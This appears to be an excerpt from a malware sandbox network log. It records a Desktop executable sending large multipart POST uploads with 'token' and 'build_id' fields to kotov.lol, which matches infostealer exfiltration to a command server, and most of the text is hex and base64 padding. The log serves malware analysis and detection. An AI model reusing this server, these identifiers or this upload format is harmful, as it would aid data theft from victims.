                                                                                                                    2024-11-30 10:34:41 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 47 43 41 46 43 41 46 48 4a 4a 44 42 46 49 45 43 46 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 33 64 37 32 30 30 66 65 33 35 39 31 65 65 30 39 39 35 39 37 33 32 37 31 39 65 37 31 33 37 35 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 46 43 41 46 48 4a 4a 44 42 46 49 45 43 46 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 35 62 61 33 63 32 35 66 61 37 62 38 30 31 31 32 33 34 61 64 30 39 64 37 37 62 36 33 34 66 31 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 46 43 41 46 48 4a 4a 44 42 46 49 45 43 46 42 4b 45 0d 0a 43 6f 6e 74
                                                                                                                    Data Ascii: ------GCAFCAFHJJDBFIECFBKEContent-Disposition: form-data; name="token"63d7200fe3591ee09959732719e71375------GCAFCAFHJJDBFIECFBKEContent-Disposition: form-data; name="build_id"c5ba3c25fa7b8011234ad09d77b634f1------GCAFCAFHJJDBFIECFBKECont
                                                                                                                    2024-11-30 10:34:41 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    2024-11-30 10:34:41 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    2024-11-30 10:34:41 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    2024-11-30 10:34:41 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    2024-11-30 10:34:41 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    2024-11-30 10:34:41 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    2024-11-30 10:34:41 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    2024-11-30 10:34:41 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    2024-11-30 10:34:41 UTC6186OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    2024-11-30 10:34:43 UTC158INHTTP/1.1 200 OK
                                                                                                                    Server: nginx
                                                                                                                    Date: Sat, 30 Nov 2024 10:34:43 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    23192.168.2.44977195.217.25.2284436976C:\Users\user\Desktop\file.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:34:42 UTC319OUTPOST / HTTP/1.1
                                                                                                                    Content-Type: multipart/form-data; boundary=----AFCBKFHJJJKKFHIDAAKF
                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                    Host: kotov.lol
                                                                                                                    Content-Length: 393697
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-11-30 10:34:42 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 33 64 37 32 30 30 66 65 33 35 39 31 65 65 30 39 39 35 39 37 33 32 37 31 39 65 37 31 33 37 35 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 35 62 61 33 63 32 35 66 61 37 62 38 30 31 31 32 33 34 61 64 30 39 64 37 37 62 36 33 34 66 31 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 0d 0a 43 6f 6e 74
                                                                                                                    Data Ascii: ------AFCBKFHJJJKKFHIDAAKFContent-Disposition: form-data; name="token"63d7200fe3591ee09959732719e71375------AFCBKFHJJJKKFHIDAAKFContent-Disposition: form-data; name="build_id"c5ba3c25fa7b8011234ad09d77b634f1------AFCBKFHJJJKKFHIDAAKFCont
                                                                                                                    2024-11-30 10:34:42 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    2024-11-30 10:34:42 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    2024-11-30 10:34:42 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    2024-11-30 10:34:42 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    2024-11-30 10:34:42 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    2024-11-30 10:34:42 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                    2024-11-30 10:34:42 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
